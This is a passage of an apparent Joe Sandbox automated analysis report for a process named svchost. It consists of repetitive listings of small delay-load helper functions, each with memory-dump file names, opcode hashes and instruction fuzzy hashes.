                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cf75758f51c8c6ad2c6f07275478db587d6711eb0735f684245fef660087bf43
                                                            • Instruction ID: 7f3ebbecf67778ec228e4b03edbd1346503ffbadaa79a04fcce802cbc67745f0
                                                            • Opcode Fuzzy Hash: cf75758f51c8c6ad2c6f07275478db587d6711eb0735f684245fef660087bf43
                                                            • Instruction Fuzzy Hash: 5AB012C165850C7C3A04714D9C03C3B410CF4D1F14331423EF417C0180E8400C480537
                                                            Function 0084E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d32389fb27da4c34e684dbff98890d613d9aec3d49f8c5e16ef6807777dc27d2
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: d32389fb27da4c34e684dbff98890d613d9aec3d49f8c5e16ef6807777dc27d2
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 881d4937c1b1a97481edce0e3ab5f35a136c428cc70589ed63906ca33080fbf2
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 881d4937c1b1a97481edce0e3ab5f35a136c428cc70589ed63906ca33080fbf2
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c7f5bae56c267d96f67e33311212b4f1f63fbe492a29ecf73348a7bd1b4d41d0
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: c7f5bae56c267d96f67e33311212b4f1f63fbe492a29ecf73348a7bd1b4d41d0
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c195487a670e1500de4a333264f76eb95284f8053c83b5992fd2de0192458aed
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: c195487a670e1500de4a333264f76eb95284f8053c83b5992fd2de0192458aed
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a9b78852c1a6696f1bd575ab99d4ae2754c02c42d2f0d1f140746ec34cb3b646
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: a9b78852c1a6696f1bd575ab99d4ae2754c02c42d2f0d1f140746ec34cb3b646
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 32925dd957999d336be550bca440531fb1dbbe8a1204dbea6ee57596641366f0
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 32925dd957999d336be550bca440531fb1dbbe8a1204dbea6ee57596641366f0
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e8b573f0acffa2906a15978feb7c239e5a83972c0005ece77030dffeb654b7ce
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: e8b573f0acffa2906a15978feb7c239e5a83972c0005ece77030dffeb654b7ce
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b40327fd0eba8140166ad77cba140ebedf0aaec7492adca5ec9a598b5517cd2b
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: b40327fd0eba8140166ad77cba140ebedf0aaec7492adca5ec9a598b5517cd2b
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 72213c1ac7d06fec0fc88ff8d5d974e0e9187f0c0a6a4da1ae732d2f2274ba12
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 72213c1ac7d06fec0fc88ff8d5d974e0e9187f0c0a6a4da1ae732d2f2274ba12
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3c57b132ca9b59cca4cba8ac05c6578cb215802a345694e8c672c827b777305a
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 3c57b132ca9b59cca4cba8ac05c6578cb215802a345694e8c672c827b777305a
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 05114a21a03076e1ee613d9fc0193913c61b1705d0aaa7a9e622acde052281b1
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 05114a21a03076e1ee613d9fc0193913c61b1705d0aaa7a9e622acde052281b1
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            Function 0084E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8bbdccf8ca14e9834e12cac00aa9c2419d2fa62c71eb9947cb7c815486533828
                                                            • Instruction ID: 1a1b56262d9fdacb30d47008734466aa4258b2a016767fadd8acaea5299e3c7b
                                                            • Opcode Fuzzy Hash: 8bbdccf8ca14e9834e12cac00aa9c2419d2fa62c71eb9947cb7c815486533828
                                                            • Instruction Fuzzy Hash: C6A011F22A800E3C3008A200AE02C3B020CF0C0B28330802EF822E0280AC8008000833
                                                            Function 0084E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 18346b9ea14d82bf257d0309531c648ba77df6202606aeabf31449d6defc2b42
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 18346b9ea14d82bf257d0309531c648ba77df6202606aeabf31449d6defc2b42
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            Function 0084E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7c27df7ffb2ed32b8c8eadb5a7c281e2698336baa5ac74b8a19064c29cff488c
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 7c27df7ffb2ed32b8c8eadb5a7c281e2698336baa5ac74b8a19064c29cff488c
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            Function 0084E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
